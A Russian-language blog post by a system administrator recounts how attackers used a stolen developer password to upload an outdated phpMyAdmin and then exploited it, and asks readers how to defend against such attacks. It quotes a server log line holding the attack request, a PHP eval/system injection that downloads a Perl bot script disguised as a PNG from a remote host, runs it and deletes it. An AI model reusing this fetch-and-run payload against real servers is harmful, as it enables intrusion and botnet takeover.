nlothik (nlothik) wrote,
nlothik
nlothik

История одного взлома

Началось всё достаточно банально. У дурака-девелопера спёрли пароль. Но что было дальше -- меня немного удивило.

Из Китая зашли под паролем девелопера, и загрузили на сайт полный дистибутив PHPMyAdmin годичной давности. В нём, разумеется, было навалом дыр. Далее, на протяжении аж двух недель этой дыркой пытались воспользоваться. И, наконец, воспользовались.

В логе было вот такое:

ip_hidden - - [13/Feb/2012:01:02:13 -0600] "GET /phpmyadmin/\rconfig/config.inc.php?eval=system('echo cd /tmp;wget http://ip_hidden/apache_32.png;mv apache_32.png -O p2.txt;curl -O http://ip_hidden/apache_32.png;mv apache_32.png; mv apache_32.png p.txt;lynx -DUMP http://ip_hidden/apache_32.png;mv apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 200 9497 "-" "curl/7.19.2 (i686-pc-linux-gnu) libcurl/7.19.2 OpenSSL/0.9.8i zlib/1.2.3 libidn/1.5"

Что делает эта штука? Скачивает файл apache_32.png, который на самом деле не картинка, а Перловый скрипт, переименовывает его, запускает через Перл, и стирает сам файл скрипта.

Скрипт дальше делает всё, что хочет хозяин скрипта (это ботовый скрипт).

Я вот думаю, а как от этого уберечься?

Вижу несколько вещей, которые можно бы сделать.

1. Автоматический аудит веб скриптов через NESSUS.
2. Запретить PHP выполнять сторонние программы. Не решение -- некоторые сайты используют тот же Image Magick, и он перестанет работать.

В-общем, как-то особо и нет решений, кроме аудита.

Может, кто из более бородатых что подскажет.
Tags: компьютерное, сисадминское
Subscribe

  • Всё выше и выше и выше

    Друже ny_quant рассказал о том, что у них на рынке домов творится дикий ажиотаж. Подтверждаю, у нас тоже самое, цены растут как на дрожжах, и…

  • (пост) ковидное

    Вторую неделю живём без масочек. Маски отменили в 1700 в пятницу, 9-го числа. А 13-го числа, в среду, был всплеск новых случаев ковида, возможна…

  • Компромисс

    Говорят, минималку таки сделают 11 монет в час. 15 у них не вышло протолкнуть. Вот с такими цифрами можно уже соглашаться. Хотя лично я считаю,…

  • Post a new comment

    Error

    default userpic

    Your reply will be screened

    Your IP address will be recorded 

    When you submit the form an invisible reCAPTCHA check will be performed.
    You must follow the Privacy Policy and Google Terms of use.
  • 0 comments